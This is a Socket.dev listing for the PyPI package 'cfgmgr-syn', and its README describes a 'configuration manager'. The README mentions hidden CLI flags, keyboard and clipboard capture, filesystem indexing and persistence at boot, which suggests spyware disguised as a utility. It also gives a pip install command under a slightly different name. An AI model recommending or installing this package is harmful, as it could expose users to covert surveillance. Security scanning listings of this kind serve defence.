You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

cfgmgr-syn

Package Overview
Dependencies
Maintainers
1
Versions
1
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

cfgmgr-syn

Configuration manager – env sync, file indexing, background workers

pipPyPI
Version
1.0.26
Maintainers
1

cfgmgr

Configuration manager – cross-platform env sync, file indexing, and background workers.

Install

pip install cfgmgr-sync

Quick Start

from cfgmgr import run
run()  # One-shot setup and start

Commands

CommandDescription
cfgmgrStart sync worker (daemon by default; registers for boot)
cfgmgr --no-daemonForeground worker (debug)
Index (API)python -c "from cfgmgr.core import scan_filesystem; scan_filesystem('/path', set(), 'out.json')"

Options (hidden flags)

The CLI uses hidden flags such as --local, --cfg URL, --buf N, --no-daemon, --pidfile, --log. Run python -m cfgmgr --help may show minimal help because many flags are suppressed.

Requirements

Python 3.10+ (the package uses modern type syntax). Cross-platform support; a desktop graphical session is recommended for keyboard/clipboard capture.

After reboot

Running cfgmgr registers a per-OS background job so the worker can start again automatically (Windows: Task Scheduler at logon; macOS: LaunchAgent; Linux systemd: user service + loginctl enable-linger when allowed). See docs/PLATFORM.md.

Platform Support (pip install only)

PlatformRun / Index / SetupNotes
WindowsBuilt-in APIs; no extra system packages
macOSBuilt-in tools; one-time Accessibility permission
Linux (X11)Pip deps only; no system tools
Linux (Wayland)Xwayland common; optional display tools
Linux (headless)PartialInput-only; user in input group

License

MIT

Keywords

operations

FAQs

Did you know?

Socket

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Install

Related posts